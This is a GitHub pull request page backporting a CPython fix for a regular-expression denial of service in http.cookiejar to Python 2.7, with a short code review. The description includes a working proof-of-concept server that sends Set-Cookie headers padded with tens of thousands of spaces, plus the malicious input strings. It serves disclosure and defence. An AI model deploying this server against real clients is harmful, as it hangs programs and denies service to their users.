[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17345

vstinner · 2019-11-22T14:36:25Z

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

\d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

from http.server import BaseHTTPRequestHandler, HTTPServer

def make_set_cookie_value(n_spaces):
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(204)
        self.send_response_only(204)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1 else
            65506  # Max header line length 65536
        )
        value = make_set_cookie_value(n_spaces)
        for i in range(99):  # Not necessary, but we can have up to 100 header lines
            self.send_header("Set-Cookie", value)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

import requests
requests.get("http://localhost:44020/")

Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)

https://bugs.python.org/issue38804

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf)

vstinner · 2019-11-22T14:37:23Z

@bcaller @serhiy-storchaka: Would you mind to review carefully this backport to Python 2.7? I had to fix multiple conflicts during the backport.

bcaller

LGTM.

bcaller · 2019-11-22T17:12:42Z

Lib/cookielib.py

@@ -266,7 +270,7 @@ def http2time(text):
    return _str2time(day, mon, yr, hr, min, sec, tz)

 ISO_DATE_RE = re.compile(
-    """^
+    r"""^


Is there a reason that this r is needed specifically for python 2? I suppose it is preferred, but gives the same regex with or without (str(sre_parse.parse("""^... with and without give the same result).
Unrelated to this change, I just noticed that the backslash in [-\/] doesn't do anything. Not sure why it's there.

Oh I see the r wasn't in the python2 branch.

So.... adding the r is correct, right?

yes. Ignore me.

vstinner added the type-security A security issue label Nov 22, 2019

the-knights-who-say-ni added the CLA signed label Nov 22, 2019

bedevere-bot added the awaiting core review label Nov 22, 2019

bcaller approved these changes Nov 22, 2019

View reviewed changes

vstinner merged commit e649903 into python:2.7 Nov 24, 2019

vstinner deleted the cookiejar_regex27 branch November 24, 2019 15:49

bedevere-bot removed the awaiting core review label Nov 24, 2019

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17345

[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17345

Uh oh!

vstinner commented Nov 22, 2019 •

edited by bedevere-bot

Loading

Uh oh!

vstinner commented Nov 22, 2019

Uh oh!

bcaller left a comment

Uh oh!

bcaller Nov 22, 2019

Uh oh!

bcaller Nov 22, 2019

Uh oh!

vstinner Nov 22, 2019

Uh oh!

bcaller Nov 22, 2019

Uh oh!

Uh oh!

Uh oh!

[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17345

[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17345

Uh oh!

Conversation

vstinner commented Nov 22, 2019 • edited by bedevere-bot Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

vstinner commented Nov 22, 2019

Uh oh!

bcaller left a comment

Choose a reason for hiding this comment

Uh oh!

bcaller Nov 22, 2019

Choose a reason for hiding this comment

Uh oh!

bcaller Nov 22, 2019

Choose a reason for hiding this comment

Uh oh!

vstinner Nov 22, 2019

Choose a reason for hiding this comment

Uh oh!

bcaller Nov 22, 2019

Choose a reason for hiding this comment

Uh oh!

Uh oh!

vstinner commented Nov 22, 2019 •

edited by bedevere-bot

Loading